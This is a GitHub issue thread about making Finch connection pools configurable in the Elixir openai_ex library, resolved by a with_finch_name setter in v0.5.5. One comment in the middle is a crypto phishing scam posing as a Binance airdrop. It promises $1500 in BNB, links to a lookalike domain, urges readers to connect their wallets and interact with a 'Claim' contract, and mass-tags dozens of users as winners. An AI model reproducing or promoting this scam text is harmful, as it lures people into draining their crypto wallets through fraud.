### ISSUE TITLE
Finch configuration

### ISSUE THREAD

**Issue by restlessronin** [restlessronin/openai_ex#76]
@restlessronin are you still against providing configuration for Finch?

I would love to tweak some of the connection options too and I don't see a way to do it. Having a glance at the code, I think the way to do it would be to hook into this line:

https://github.com/restlessronin/openai_ex/blob/669c663a557ab691b6b8b01c51790c2984ad716b/lib/openai_ex/application.ex#L9C6-L9C6

we could grab the options from either Config and/or specify a callback function in config that is called to fetch the configuration - I don't mind either solution.

_Originally posted by @hubertlepicki in https://github.com/restlessronin/openai_ex/issues/48#issuecomment-1873875245_

**Comment by restlessronin** [comment]
@hubertlepicki

I would like the out-of-the-box defaults to be working fine for all non-production use-cases. And to use key-value pairs within the %OpenaiEx{} to do any remaining configuration.

Having said that, I would like to support production use cases where tweaking is necessary, but I'd prefer to exhaust non config options first. It seems like you want to adjust the pools that finch is using. Is that correct?

If so, would it work for you to do something like

Finch.start_link(
    name: MyConfguredFinch,
    pools: ...
)
and then use a new key-value setter

myopenai = openai |> with_finch_name(MyConfiguredFinch)
which would use yourMyConfiguredFinch instance instead of the default OpenaiEx.Finch.

**Comment by hubertlepicki** [comment]
@restlessronin that will work for me

**Comment by restlessronin** [comment]
@hubertlepicki done. published as v0.5.5. take it for a whirl and let me know if anything else needs to be done.

**Comment by steven-sosebee** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://link.binancerewards.online/T4wOMA)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://link.binancerewards.online/T4wOMA) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @spkuehl, @gebbbiii, @KewlAid83, @krzysztof-naglik-codilime, @luyzdeleon, @nishit-g, @vxzhong, @lujianmei, @DMuld, @MAOSOE, @Kreedzt, @fondroid, @avardaan, @ElectronSz, @KamilKwapisz, @SparrowOchon, @alan-andrade, @Fooooooooooox, @developerasun, @SerialDev, @secretsauce988, @cbdyzj, @qhxin, @enixdark, @dleurs, @m4r1-pac, @Bamco, @sunvim, @YangYuchu, @albincsergo, @stoppark, @kenvinwei, @pietromenna, @YusufJaj, @Xexanoath, @fraystation, @bayu-fahrera, @gunzombie, @C-Band, @Ivan92750, @hungpro30, @Crushedlex, @skycccu, @Dev-HyunSang, @joelvh, @kazani-351, @hefgi, @lyknice23, @huazhuangnan, @joshkmartinez

**Comment by restlessronin** [comment]
@hubertlepicki I am closing this issue assuming that things are working as you expected.
